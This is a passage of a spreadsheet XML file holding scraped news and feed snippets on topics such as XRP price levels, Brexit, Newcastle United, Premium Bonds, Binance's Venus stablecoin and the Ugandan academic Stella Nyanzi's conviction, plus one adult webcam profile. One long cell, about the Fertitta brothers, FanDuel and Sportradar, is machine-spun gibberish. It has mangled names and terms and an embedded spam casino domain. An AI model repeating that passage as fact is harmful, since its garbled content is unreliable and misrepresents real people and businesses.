15-mins, Fibonacci 38.2% 1-Day, BB 15-mins, BB 15-mins Middle, SMA 5 1-h, SMA 5 4-h and BB 1-h middle. The range resistance at $0.2841 will determine the path for Ripple. A break above this will send XRP above $0.3. otherwise, failure to rise above the resistance could press the price against the support at $0.24. Other support levels likely to cushion the drop are $0.2515; which has been made to stand out due to the previous Year Low and $0.2407 currently linked to the Pivot Point 1 Week S3. Find the confluence levels here.</t>
  </si>
  <si>
    <t>In 2009 all retired Gurkhas were finally allowed to settle in the UK. The post The Gurkhas: We felt like second-class citizens appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Casino-operating Fertitta brothers are categorized as start in Nevada. FanDuel class partnering with Sportradar AG to roll-out live streaming that is in-app In Nevada, the Culinary professionals sum will have legitimately instructed nation Securities and loan charge (second) besides the NASDAQ bourse to investigate if perhaps the pals in control of land betting user, white sway hotel incorporate, blunt and Lorenzo Fertitta, might have a struggle of great curiosity. Expenses inquiry: As stated in formal Wednesday pr release by the device, the actual businessman will have significant stakes in Los Angeles-headquartered expenditures company, Fertitta investment, but I have up until now been unsuccessful to do these holdings shown to those maintaining basic in yellow diamond motel Inc. Sportsbetting challenger: The record from the Culinary Workers sum claims in which not having transparency might have took lenders in blue Rock Resorts designed missing out during a internet based business after January have seen Fertitta lead a collection c backing workout that brought up some $17.5 million for sports marketing steady the excitement Network involved. This New York City City-based firm opened in Dec of 2018 and definitely comes with a 100 % free on the go method that allows clients to track stakes, achieve sports betting cautions and explore what kind of money is being staked on every side in the contest that is particular. Double assignments: Zachary Poppel, over the Culinary Workers device, displayed until this conflict that is alleged of will even cost Michael Britt, whom holds the blog of federal associations Senior Vice-President for both blue Rock and Fertitta. Formal drive: The Nevada device used the press introduction to details that this photo has now need the SEC and NASDAQ to discover once this conflict that is potential of need to always be discovered to brokers in yellow Rock destinations Inc and or perhaps a Las Vegas-headquartered house operator’s event with regards to adventure Network corporate in the sports betting area ‘means thier family tight acquires possibilities owed to investors.’ Poppel’s statement studied… “Both the second and NASDAQ bring restrictions endorsing disclosure that is fair honorable movement of online business offerings. But if thinking about Fertitta capitol, pink Rock destinations provided businesses might have a time that is hard wherever loyalties lay as well as the agency happens to be administering our program code of principles.” Large mansion: Through her great majority need for Station Casinos, blue move has and regulates some 21 properties disperse across Nevada and florida the actual Palms Casino motel. The online broadcast domain name at CalvinAyre.com reported that walk spotted the business multitude a party for this exercise Network corporate at this property while explaining made by the Fertitta pals really are furthermore, relatives over the billionaire business owner behind the nearby great Nugget nevada, Tilman Fertitta. American daily hallucination football and betting with bookies owner, FanDuel ensemble, contains released the signing connected with a attend to Sportradar AG this is certainly to have their cell playing iphone app property living channels due to a large numbers of large sports and hockey competitions. Baseball choice: The innovator used a synovial sunday report to show that the first-of-its-kind plan will involve the active canal Web help from Sportradar AG actually being incorporated onto it is movable betting software package that will offer punters by using the time to watch a variety to live clean move which includes EU baseball. Nj-new jersey perk: FanDuel association explained about the creation is almost always to be made available initially merely to fans in Colony which will entail the marrying of not a recorded presentation baseball with sportsbetting likelihoods to assist you to assist gamblers to put a bet with an celebration these include absolutely monitoring living. Tryout triumph: Niall Connell, Sportsbook common boss for FanDuel, said where the top notch roll-out of a typical current internet specialist for their firm’s mobile sportsbetting iphone app follows the completion of a typical impressive litigation relating football explaining ready to offer gamblers ‘with a first-class betting time.’ Connell’s assertion studied… “By making Sportradar AG’s hot conduct using the net accessible alongside all of our gambling stores, our new betting has long been the elite baseball city through the ever-growing sports betting sector.” North american elaboration: For her function, Neale Deeley, each one of us marketing and playing Vice-President for Sportradar AG, casinopokies777.com employed the media roll-out to assert that reside loading is an established area of sportsbetting work various other regions and that also this package presents the on your first try that these innovative developments can absolutely be distributed around end users around the US .. Deeley’s statement browsed… “We are really stimulated to bring online to stream at the nation consumer with FanDuel collection. We have been long-standing dates of both FanDuel staff and dad or mom operation William Hill a betting exchange like Betdaq across a range that is wide of and fantasy expertises. We’re satisfied to end up a extended an integral part of their particular north american control designs.”</t>
  </si>
  <si>
    <t>http://kiteboarding.com/products.asp?cat=Twintips source The post Kiteboarding: Twintip Rocker Explained appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>It's a fragmented entertainment environment, where the latest buzzy TV series might be spread across four or five subscriber-only platforms. Have we hit peak subscription?</t>
  </si>
  <si>
    <t>Khmer Swedish Dictionary – travel dictionary to translate Khmer to Swedish. Click on the list to show Khmer or Swedish synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Khmer Swedish Dictionary →</t>
  </si>
  <si>
    <t>Silicon Valley’s countercultural aura is gone now that Google develops AI for China and Palantir helps monitor immigrationIf there was one thing that united the founders of today’s tech giants in their early days it was contempt for politics, manifested as suspicion of government and a pathological aversion to regulation (not to mention paying taxes). In part, this was a product of their origins in the counterculture of the 1960s. But the aversion endured as the companies grew. One saw it, for example, in the US poet and cyberlibertarian John Perry Barlow’s 1996 Declaration of the Independence of Cyberspace. “Governments of the Industrial World,” it began, “I come from Cyberspace, the new home of Mind. On behalf of the future, I ask you of the past to leave us alone. You are not welcome among us. You have no sovereignty where we gather.” For many years, Silicon Valley companies didn’t even bother to have lobbyists in Washington. As late as 2015, Eric Schmidt, then the executive chairman of Google, was predicting that authoritarian governments would wither away in a comprehensively networked world, which made some of us wonder what exactly Dr Schmidt was smoking. Continue reading… Read More</t>
  </si>
  <si>
    <t>PEAKY BLINDERS is back with a brand new series, but while many fans get excited about what’s to come, a shock death is still being debated. Daily Express :: TV and Radio Feed Peaky Blinders season 5: ‘He didn’t want to go’ Star speaks out on shock death</t>
  </si>
  <si>
    <t>Labor's Jim Chalmers says the government should bring forward its mid-year budget update and use the cash flowing in from the nation's miners to fast-track personal income tax cuts and boost spending.</t>
  </si>
  <si>
    <t>EASTENDERS viewers could see an almighty twist in upcoming episodes with the return of Bianca Butcher. Whitney Dean is in the dark about her fiancé’s secret rendezvous with Ben Mitchell, but all that could change should she and Bianca team up to get the ultimate revenge. Daily Express :: TV and Radio Feed EastEnders spoilers: Whitney Dean’s secret plan to destroy Callum exposed in Bianca twist?</t>
  </si>
  <si>
    <t>A fuel tanker has exploded in Tanzania, killing dozens as flames ripped through crowds that had gathered to siphon petrol from it.</t>
  </si>
  <si>
    <t>Newcastle United’s warm-up has come under the microscope in the last week or so but there was nothing wrong with it ahead of the win vs Spurs This post written by Ciaran Kelly originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>Savant has refined its Partners in Excellence program which aims to give integrators and their clients a large selection of devices for their smart home ecosystem. Upgrading the program adds three tiers for Savant supported manufacturers: Savant Recommended, Certified and Supported. Savant Recommended partners, the highest tier, are the best-in-class solutions and are all tested by Savant’s engineering team for additional performance testing. Recommended class products will be available to purchase through the Savant store with brands like Apple, Harman and Netgear already classifying. Supported and Certified-level products will be tested to ensure integration between the products and Savant’s smart home platform. “As the control and automation landscape has continued to evolve, integration with third party devices has increased in magnitude and complexity with the onslaught of new entrants in the mainstream IoT market,” Savant vice-president George Katsiris says. “Part of the emphasis with our Partners in Excellence Program is to direct integrators toward the highest quality solutions. Our objective is to select and highlight the best industry partners that are committed to providing end-users with the most reliable smart home experience.” The post Savant enhances its Partners in Excellence Program appeared first on Connected Magazine. Reference: Connected Home</t>
  </si>
  <si>
    <t>Natassia Chrysanthos</t>
  </si>
  <si>
    <t>Before Asha Boswarva was juggling her final years of school with a role on TVBin Foxtel TV series Lambs of God, she and school mate Rebecca Burchett were performing in year four plays together.</t>
  </si>
  <si>
    <t>Racing editor Ray Thomas and the team look to pick a sure thing with this week's edition of 'The Banker.'</t>
  </si>
  <si>
    <t>Benjamin Cleary and VR creator Michael O’Connor are overseeing the project. See full article at Film-news.co.uk » The post Taron Egerton and Lucy Boynton team up for virtual reality project appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>After just two instalments and no end of scepticism from AFL clubs and fans, the maligned AFLX exhibition is canned for 2020, allowing for more column inches for the expanded AFL Women's competition.</t>
  </si>
  <si>
    <t>Tony Walker</t>
  </si>
  <si>
    <t>The government needs to be extremely wary of getting suckered into a militarised China containment policy that would further exacerbate regional tensions.</t>
  </si>
  <si>
    <t>The 157-acre lot in the Hollywood Hills has been the subject of complex litigation over who actually owns the propertyA billion dollars for an empty tract of land always sounded like a Hollywood fairytale. This week reality came crashing down on the investors, real estate agents and feuding litigants who – all too briefly – became embroiled in the greatest property story on earth.The land in question is a 157-acre parcel perched high in the Hollywood Hills that overlooks the mansion-studded hills of Bel-Air and Los Angeles. Down the years, it has interested an eclectic mix of would-be buyers including the sister of the Shah of Iran, Merv Griffin, Brad Pitt and Tom Cruise. Continue reading… Read More</t>
  </si>
  <si>
    <t>The average parental contribution for homebuyers this year is £24,100, Legal &amp; General finds. Read more? Click here</t>
  </si>
  <si>
    <t>With the new season almost upon us, Steve Bruce has been speaking to the press earlier today ahead of Sunday’s game at St James’ Park. Here’s some of the key topics he discussed, with the new head coach giving his thoughts on the new signings, the boycott, the current injury list and Sundays’ opponents Arsenal: Here’s what he started with, stating that the pressure is... Source</t>
  </si>
  <si>
    <t>PRINCE Andrew has flown home from a golf holiday for crisis talks with royal advisers about how to deal with continued scrutiny over his relationship with late paedophile Jeffrey Epstein and Virginia Roberts, according to The Sun.</t>
  </si>
  <si>
    <t>My Kinks: Bathing and perfuming before having sex can be rou Webcam profile: I am a young Latina with desire to meet friends and please them Soy una joven latina con ganas de conocer amigos y complacerlos Favourite sex position: What I do in my amateur show: What I don’t like: Gallery</t>
  </si>
  <si>
    <t>The journalist and activist says he was assaulted by a group of men in London earlier this month. Read more? Click here</t>
  </si>
  <si>
    <t>Brendan Fevola has bid farewell to the game he’s played his entire life in an emotional goodbye over the weekend.</t>
  </si>
  <si>
    <t>A national sense of “complacency” is leaving gaping holes in Australia’s defences above the 26th parallel, leaving the country vulnerable to exploitation, defence experts claim.</t>
  </si>
  <si>
    <t>this post definately belongs in the madhatter ‘weird’ category .</t>
  </si>
  <si>
    <t>David Gambrill</t>
  </si>
  <si>
    <t>Buffeted by severe weather claims, the Bank of Montreal has decided to exit the property and casualty reinsurance side of the business, BMO announced during a conference call Tuesday. “In Q4 of last year, we said we were reviewing ways… The post Sign of the times: Why this bank bailed out of P&amp;C reinsurance appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Saturday Intervals Metcon (AMRAP – Reps) 90sec on/ 90sec off x 3 a) 150m Run + Max wall balls b) 150m Run + Max V-ups c) 150m Run + Max KB swings Rx 20/12 Rx+ 24/16 *Score is combined WB + V-Ups + Swings *Pair up, you go I go style The post WOD WOD, August 10, 2019 appeared first on CrossFit Chamber.</t>
  </si>
  <si>
    <t>Man City fans split on Pep Guardiola dilemma ahead of Bournemouth fixture Original Source Manchester City fans are undecided on who Pep Guardiola should select to play up front when the Blues go to Bournemouth this weekend. Sergio Aguero started against Tottenham on Saturday after Gabriel Jesus had impressed in the opening-day thumping of West Ham. City’s No.10 vindicated Pep Guardiola’s decision to start him ahead of Jesus with the team’s second goal against Mauricio Pochettino’s side. But his goal hasn’t proved to be enough to convince all City fans that he should keep his place in the team for Sunday’s trip to the Vitality Stadium. In fact, more City fans would prefer to see Jesus return to the XI than see Aguero keep his place. Read More In a poll conducted by MEN Sport on Twitter, 38 per cent of the 706 people who responded to our poll said they would like Jesus to start on the South Coast, with 35 per cent saying Aguero should retain his place in the XI. Just 27 per cent of fans believe the pair should start together. Meanwhile, Pep Guardiola has said he is not in favour of VAR being suspended despite City being on the wrong end of another decision against Spurs. “No, no, no, no, we have to continue,” Guardiola said. “I remember the first season when I arrived here when you touched someone like this, it was a penalty. Do you remember the two penalties in the Stoke City game? Read More Read More “It was like this – it was a penalty in the box. And after they adapted things. I think they are going to adjust in the games. But if it’s hands it’s hands. “For me it’s not clear when I watch it at different angles, honestly it’s not clear but maybe it’s a penalty. But it was a penalty last season in the quarter-finals of the Champions League.”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 City fans split on Pep Guardiola dilemma ahead of Bournemouth fixture appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Taylor Swift is re-recording her old songs. See full article at Film-news.co.uk » The post Cara Delevingne praises Taylor Swift's 'innate strength' amid Scooter Braun row appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Meaghan Wray</t>
  </si>
  <si>
    <t>Both sisters plan to have a double mastectomy once their chemotherapy is finished.</t>
  </si>
  <si>
    <t>Physically being at an auction is no longer a crucial component of buying under the hammer.</t>
  </si>
  <si>
    <t>NHS England is funding a new treatment for patients with severe haemophilia A. The post New drug for people who can bleed uncontrollably appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Elias Clure</t>
  </si>
  <si>
    <t>Gangland figure Roberta Williams is released on bail after being charged with threatening to kill a television producer involved in her proposed reality program.</t>
  </si>
  <si>
    <t>When rescuers tried to save a baby raccoon from a basketball hoop, mama raccoon made sure to supervise the entire operation. RELATED VIDEO: Helpless animal found glued to the road: https://youtu.be/o-qdJaxh-Ig After a baby raccoon gets spooked from Fourth of July fireworks and ends up stuck in a basketball net, rescuers attempt to cut him free without alarming the nearby mother. ****************************************************************** Check out more Animalkind stories! Subscribe to our YouTube channel: https://www.youtube.com/animalkind AND if you love Animalkind, subscribe to our other channels here: –Feel-good stories? Check out Humankind! https://www.youtube.com/humankindvideos –Love our troops?! Check out Militarykind! https://www.youtube.com/militarykind –Want even more amazing kid stories?! Check out Kidskind!: https://www.youtube.com/kidskind source</t>
  </si>
  <si>
    <t>Lloyd Bent</t>
  </si>
  <si>
    <t>More than £63 million in Premium Bond prizes have yet to be claimed by winners across the UK. There are still five prizes worth £100,000 left where no winner has come forward, as well as lots of smaller amounts waiting to be claimed. This includes 92,000 unclaimed prizes in Scotland, and 559,000 unclaimed prizes in London and south east England. An unclaimed prize is classified as one that has not been claimed within 18 months of it being won. There is no time limit to making a claim. NS&amp;I, which runs Premium Bonds, contacts winners when they have a prize to claim, however sometimes this does not work if contact details are not up-to-date or letters get lost in the post. And sometimes people may not know that they could potentially be due a letter, having forgotten about bonds they bought a long time ago or were given as a gift. How to check if you have Premium Bonds If you think there is a chance that you could have Premium Bonds, but you are not sure, there is a tracking service on the NS&amp;I website. To check if you have any bonds you need to fill out a form with your personal details and send it off. If you do have Premium Bonds, then you will be contacted. How to check if you have won a prize If you know you have bonds and want to find out if you are owed a prize, you can also do this on the NS&amp;I website. To do so you need your unique holder’s number, which can be found on your bond record or by logging into your account on the NS&amp;I website. It is a nine or 10 digit number, or an eight digit number with a letter at the end. You then need to enter this number into the prize checker and it will tell you whether you are due to claim a prize or not. You can also use your NS&amp;I number to check if you have won a prize, but this can only be done in the app and not on the website. If you have an NS&amp;I number, you’ll find it on most communications you’ve had with them. If you only know your bond numbers, or have lost your documents, then the only way to find out if you have won a prize is to write to NS&amp;I and request a bond record. This will show all the bonds you hold as well as your holder’s number and your NS&amp;I number. Read more: Here are the winners in the Premium Bonds prize draw for August 2019 PPI checker tools: how to check if you can make a claim School uniform costs are rising so parents are turning to second-hand The post Premium Bonds: how to check if you have unclaimed prizes in your old or forgotten bonds appeared first on inews.co.uk. The post Premium Bonds: how to check if you have unclaimed prizes in your old or forgotten bonds appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Isle Royale National Park is where adventurers will find a unique, remote, wilderness experience. Join a group of three friends as they backpack their way across the island’s scenic and rustic trails. To learn more about Isle Royale, visit: www.michigan.org/article/trip-idea/things-do-isle-royale-national-park-ultimate-pure-michigan-guide The small island in the middle of Lake Superior is filled with diverse wildlife and […] The post Isle Royale National Park Experience | Pure Michigan appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>A desperate addict who was scared off by a shopkeeper he tried to rob at knifepoint has been jailed for more than two and a half years.</t>
  </si>
  <si>
    <t>John Copsey</t>
  </si>
  <si>
    <t>An elderly couple in their seventies were killed in a collision on the Coquihalla Highway north of Hope Friday evening.</t>
  </si>
  <si>
    <t>Labour vows to bring down Johnson and delay Brexit Original Source LONDON (Reuters) – The Labour Party has urged rebel MPs in the ruling Conservatives to help block a no-deal Brexit by bringing down Prime Minister Boris Johnson’s administration and allowing its leader Jeremy Corbyn to form a caretaker government. FILE PHOTO: Britain’s opposition Labour Party leader Jeremy Corbyn gestures as he speaks during a rally calling for a general election in London, Britain July 25,2019. REUTERS/Simon Dawson Johnson has promised to take Britain out of the European Union by Oct. 31, with or without a deal, setting the scene for a showdown in parliament where MPs are opposed to a divorce without a transition agreement. In a letter to opposition party leaders and several senior Conservatives opposed to a disorderly exit, Corbyn said his “strictly time-limited temporary government” would delay Brexit and hold a general election. He said Labour would campaign in the election to hold a second referendum on the Brexit terms, including an option as to whether the country should remain in the bloc three years after it voted to leave. “This government has no mandate for No Deal, and the 2016 EU referendum provided no mandate for No Deal,” Corbyn said. “I therefore intend to table a vote of no confidence at the earliest opportunity when we can be confident of success.” A spokeswoman for Johnson’s Downing Street office said the choice was clear: “This government believes the people are the masters and votes should be respected, Jeremy Corbyn believes that the people are the servants and politicians can cancel public votes they don’t like.” MPs return from their summer break on Sept. 3, reconvening for a battle over Brexit that will determine the fortunes of the world’s fifth-largest economy. Johnson, who led the 2016 campaign to leave the EU, has staked his premiership on getting Britain out by Oct. 31, prompting politicians from all sides to try to stop him. On Wednesday he said those trying to block Brexit were engaged in “a terrible kind of collaboration,” after former Chancellor Philip Hammond said parliament would block a no-deal exit, and that the government must respect it. PARLIAMENT SHOWDOWN Were Johnson’s government to lose a no-confidence vote, MPs would have a 14-day period to try to form a new administration; otherwise a general election would be called, which could be held after the Oct. 31 exit date. Opponents of a no-deal exit say it would be a disaster for what was one of the West’s most stable democracies, shattering supply chains, damaging global growth, and weakening Britain’s standing in the world. Brexit supporters say while there may be short-term disruption, it would provide a clean break from the bloc and allow the economy to thrive. Parliamentary votes have shown there is a small majority against a no-deal Brexit. Corbyn, a low-key Remain campaigner during the 2016 referendum, has come under pressure from his own side to step up efforts to prevent it from happening. He said he hoped his proposal to lead a caretaker government could “halt the serious threat of No Deal, end the uncertainty and disarray, and allow the public to decide the best way ahead for our country.” But Corbyn, a veteran socialist, is a highly divisive figure in parliament and could struggle to form a majority of his own. While the political turmoil of the last year has led to an unprecedented level of cross-party cooperation, many in Johnson’s Conservative Party and others would still find it difficult to vote for Corbyn. Jo Swinson, the new leader of the pro-EU Liberal Democrat party which has 14 MPs in the 650-seat parliament, described the proposal as “nonsense.” “Jeremy Corbyn is not the person who is going to be able to build an even temporary majority in the House of Commons for this task,” she said. “I would expect there are people in his own party and indeed the necessary Conservative backbenchers who would be unwilling to support him.” She is due to set out her own proposal on Thursday to work with other parties to block a no-deal Brexit. Editing by Toby Chopra; Editing by Richard Chang Our Standards:The Thomson Reuters Trust Principles.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Labour vows to bring down Johnson and delay Brexit appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>It shows us how trends have changed - is it it even possible to have personal style when Instagram has become such a persuasive aggregator of fashion trends?</t>
  </si>
  <si>
    <t>Jade Macmillan And Alexandra Beech</t>
  </si>
  <si>
    <t>A portion of Australia's gas supplies could be set aside for domestic use as part of a Federal Government push to try to bring down gas prices, but industry remains opposed to the proposal.</t>
  </si>
  <si>
    <t>Hi! My name is Emma Loewen and I am 20 years old and recently moved to Lethbridge for schooling. I am very flexible with my hours and reliable. I am seeking full or part time child care work! Willing to travel and have my own reliable vehicle. •••••••••••••••••••••••••••••••••••••••••••••••••••••••• I have over 8 years of experience .. Read more</t>
  </si>
  <si>
    <t>THE clock is slowly ticking away the hours until a cosmic cataclysm renders the Earth uninhabitable. The solution is to leave the planet before its too late, a space expert has claimed. The post Cosmic cataclysm: Time is running out and humans must move to space before its too late appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Paul Cully</t>
  </si>
  <si>
    <t>Andrew Kellaway will play with Sonny Bill across the ditch as he prepares for another crack at the Wallabies jersey with the Rebels. But why New Zealand?</t>
  </si>
  <si>
    <t>Labour raises environmental concerns ahead of the four-month grouse shooting season from Monday. The post Grouse shooting: Labour calls for review amid habitat concerns appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Via Express: Russian President Vladimir Putin has remained silent, amid growing speculation that a nuclear missile accident has caused a dangerous radiation leak at a naval base. The Kremlin have confirmed that a “rocket engine explosion” at the Archangelsk base in northern Russia killed five people and injured three. Last night, Russia’s nuclear energy agency […]</t>
  </si>
  <si>
    <t>The reality is that the whole competition is hardly fair. But given the best team usually ends up winning it, it must be fair enough.</t>
  </si>
  <si>
    <t>Suddenly armed with the most explosive bowler in the world, Joe Root says Australia’s batsmen may have to change their games drastically to deal with Jofra Archer</t>
  </si>
  <si>
    <t>Not the greatest of seasons so far for Newcastle United. In six games, from Academy level up to first team, it has been a case of five defeats and one...Not the greatest of seasons so far for Newcastle United. In six games, from Academy level up to first team, it has been a case of five defeats and one... You can click here to read the full article. The post Manchester City boss tells young stars it wasn’t good enough after scoring seven against Newcastle appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>OPINION Of all the former Newcastle United players who would go on to become a vocal spokesman against the Mike Ashley regime, the odds of it being Michael Chopra who rose to prominence would probably have been pretty long. But here we are, and after a summer of disruption and upheaval, it has been the ex-Toon striker who has found himself at the forefront of the protest discourse. Source</t>
  </si>
  <si>
    <t>WEDNESDAY 28TH AUGUST 2019 ROBERT HAS A SPECTRE AT THE FEAST Robert is flustered when CCTV from...</t>
  </si>
  <si>
    <t>Max Presnell</t>
  </si>
  <si>
    <t>With the first whiff of spring, Melbourne has overshadowed the corresponding sub-Saturday meeting on the second string Kensington circuit at Royal Randwick.</t>
  </si>
  <si>
    <t>The New York Post reported some Jets "were cringing" when Holmes was smashed during Saturday's scrimmage, but he impressed when he "popped up after both hits".</t>
  </si>
  <si>
    <t>Welcome to the daily Tech Support thread for /r/Apple. Have a question you need answered? Ask away! Please remember to adhere to our rul... Daily Tech Support Thread - [August 10]</t>
  </si>
  <si>
    <t>amazingstoker posted a photo: Early morning sun hits the low cloud at Catalan Bay, Gibraltar,</t>
  </si>
  <si>
    <t>kamoi</t>
  </si>
  <si>
    <t>US$1 cheaper than the deal from a week ago AUSDOM AH2 Deep Bass Stereo Wireless Bluetooth Headphones Coupon: US15-AH2 AUSDOM AH862 HiFi Stereo Bluetooth V4.1 Headphones Coupon: US15-AH862</t>
  </si>
  <si>
    <t>Channing Tatum has insisted he will be on social media again in the future. See full article at Film-news.co.uk » The post Channing Tatum takes social media break to tap into his creativity appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Alfred Morris signed with the Cowboys and will try to make the team as a reserve running back. The 30-year-old spent 2018 with the 49ers as a backup, and he scored at least 12 PPR points in three of 14 games. He’s not worth drafting in most formats, but could become an early-season waiver addition … Continue reading "2019 Outlook: Alfred Morris"</t>
  </si>
  <si>
    <t>Johnny Vintis</t>
  </si>
  <si>
    <t>I have a question, well several actually, but one main one…..Where on earth are the Bin Zayed Group (BZG)? It was around 3 months ago that we woke up to ‘BREAKING NEWS’ and back pages claiming a big takeover was finally in the offing. Many of us instantly thought it was a typical Ashley PR stunt….but this one seemed different. The BZG were very vocal and came out to say everything was progressing well and they had submitted an offer. Ashley stayed silent which was fairly typical but he didn’t deny it – and that seemed key. As it started to look like it was fading, there was another “statement” by BZG, released 5 weeks before the season started. This was released through Peter Redding of Capital Radio in the UAE (which seemed dubious I have to say) which said: “Both parties have worked diligently in finalising a deal, none more so than ourselves. “We have completed every aspect required in a takeover process. “Press claims of no bids or Premier League approval processes are simply untrue. “The current owners have cooperated amicably throughout this process and if a deal is not forthcoming it will not be due to lack of effort from both parties.” Then……….absolutely nothing. Nothing. It is like they disappeared into the abyss. What actually happened with the takeover? But then that opens a whole load more questions. Do we really believe that Ashley has enough power to influence the Bin Zayed Group to pretend there was a takeover just to increase season ticket sales? Why has Peter Redding, who boasted that he was in regular contact with BZG, not said another word? Do BZG even exist? Was it all just a figment of my imagination? I am not a journalist but surely those who are should be at the very least asking these questions? Why hasn’t a local (or national) news outlet pushed to find out what has happened to the “bid”? Are we just supposed to forget about it? (Fancy writing for us? Get in touch at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>php step by step</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V in this video we will learn how to make login with rest api in react js. we have a make form and use fetch api for hit the server side rest api and we get the token … source</t>
  </si>
  <si>
    <t>Many deem Binance’s newly announced Venus stablecoin project as a competitor to Facebook’s Libra crypto. But Binance’s CZ says otherwise. | Source: (i) REUTERS / Darrin Zammit Lupi (ii) Shutterstock: Edited by CCN By CCN Markets: Binance has announced today its Venus stablecoin project that many deem as a competitor to Facebook’s upcoming Libra crypto. But Binance CEO Changpeng “CZ” Zhao thinks otherwise. Venus, the regional Libra While Facebook seeks to conquer the global financial world with Libra, Binance wants Venus to stay in the regional waters instead, the company said in a blog post. According to the announcement, Binance will help the development of localized fiat-pegged stablecoins and other digital assets as part of its Venus project. To facilitate the growth of the project, Binance is looking to create new partnerships with governments, companies, and other organizations involved in the blockchain space. While this hasn’t been confirmed yet, it appears that the Malta-based company will develop Venus on the Binance Chain where it already created multiple stablecoins, including the bitcoin-pegged stablecoin BTCB and the GPB-pegged BGBP crypto. details will come soon. We know Binance Chain best, of course. — CZ Binance (@cz_binance) August 19, 2019 Binance’s CZ: Venus should help Facebook’s coin instead of being a competitor Many in the crypto community have stated that Venus is Libra’s potential competitor. CZ thinks otherwise, saying that Binance doesn’t want to dominate the stablecoin market with Venus. According to CZ, the goal with Venus is to boost crypto adoption, and the exchange’s upcoming project can potentially help Libra. Pushing adoption, yes. Domination, no. Always happy to co-exist. In fact, this should help Libra, if you think about it. Will leave it at that. https://t.co/HLSywLb2mi — CZ Binance (@cz_binance) August 19, 2019 And CZ could be right here. Velocity Markets Head of Business Development &amp; Strategy Chris Wittenborn told CCN: “Assuming full legal and regulatory compliance, anything that helps regulators become familiar with this ecosystem is a benefit for both Binance but also Libra as they might be able to learn from some of the successes and failures of Binance.” According to Monica Eaton-Cardone, the owner and COO of the fintech cybersecurity company Chargebacks911, healthy, mutually beneficial competition between crypto companies will grow the size of the industry by increasing awareness and utility as well as normalizing its usage. “Remember the classic line in all the old cowboy movies, ‘This town ain’t big enough for both of us!’? That’s how it is in the cryptocurrency industry right now, only we don’t know how big the town will be – or how fast it’s going to grow,” she told CCN. Libra is the crypto of the corporate and tech world with the goal of serving the company’s stablecoin to millions of people as part of a global payment system Facebook is building. While Libra is an open blockchain project, it is centralized and owned by Facebook, facing harsh scrutiny due to its massive potential impact on the world economy as well as the privacy scandals of the company. On the other hand, Venus is a crypto project that focuses on regional markets instead of serving the global market with one coin. Therefore, this could mean that Binance will create stablecoins for individual nations all over the world for locals to use. As the two crypto projects serve two different purposes, people can use Venus for local national currency payments and Libra for global transactions side-by-side. As both companies have ambitious plans for their upcoming crypto projects that could disrupt the world economy and the finance world, the two together will certainly boost crypto adoption in case they are proven successful. This article is protected by copyright laws and is owned by CCN Markets.</t>
  </si>
  <si>
    <t>Michael Cavanagh</t>
  </si>
  <si>
    <t>Chef Julie-Anne Booth, after a lifetime sometimes cooking for royalty, is back home sharing her food experiences with regional food producers.</t>
  </si>
  <si>
    <t>A prominent Ugandan academic has bared her breasts and screamed obscenities in protest as a magistrate sentenced her to 18 months’ prison on controversial charges of “harassing” President Yoweri Museveni. The verdict against Stella Nyanzi on Friday drew the ire of rights activists who accused the government of using laws about electronic communications to stifle political dissent. Nyanzi, a university lecturer and researcher who once called Museveni “a pair of buttocks”, is expected to serve nine months in prison after having already spent nine months behind bars. Appearing in a Kampala court via video link, Nyanzi raised her middle fingers and yelled profanities in defiance as she was sentenced, before flashing her breasts as her supporters whooped and cheered. A plastic bottle was hurled at the magistrate as police tried to restore order. Bobi Wine declares 2021 Ugandan presidential bid (0:12) “Dr Stella was very upset that she was not allowed to appear in court physically and instead appeared by video link,” her lawyer, Isaac Semakadde, told AFP news agency. “There has been lack of transparency in this trial.” A second charge of “offensive communication” was dropped against Nyanzi, who has vowed not to relent in her barbed criticism of Uganda’s long-serving ruler. “I planned to offend Yoweri Museveni Kaguta, because he has offended us for 30 plus years,” she told the courtroom on Thursday before being found guilty. “We are tired of a dictatorship.” Supporters of Stella Nyanzi gesture during the court proceedings near a screen showing her via video link [Sumy Sadurni/ AFP] ‘Brutish attack’ Her offence stemmed from a Facebook post last year in which she said she wished Museveni, 74, had been burned up by the “acidic pus” in his mother’s birth canal. Prosecutors described the post as a “brutish attack on the person of the president and his late mother”. In a statement on Friday, Joan Nyanyuki, director for East Africa at human rights group Amnesty International, said: “This verdict is outrageous and flies in the face of Uganda’s obligations to uphold the right to freedom of expression … and demonstrates the depths of the government’s intolerance of criticism.” The verdict should be quashed and Nyanzi, who has been in jail since November last year, freed immediately, she said. “The Ugandan authorities must scrap the Computer Misuse Act… which has been used systematically to harass, intimidate and stifle government critics.” Ugandan pop star turned leading opposition figure Bobi Wine, who has announced his intention to challenge Museveni in 2021 elections, defended Nyanzi’s right to challenge “dictatorship, corruption and nepotism”. “The same courts which have… defended and shielded the champions of these ills have no moral authority to talk about morals,” he posted on his Twitter account on Thursday. Today, Dr. Stella Nyanzi was convicted of cyber harassment! For using ‘immoral words’ against dictatorship, corruption and nepotism. The same courts which have severally defended and shielded the champions of these ills have no moral authority to talk about morals. #Solidarity pic.twitter.com/jz5yQgHpac — BOBI WINE (@HEBobiwine) August 1, 2019 A research associate at Kampala’s prestigious Makerere University, Nyanzi holds a doctorate on sexuality in 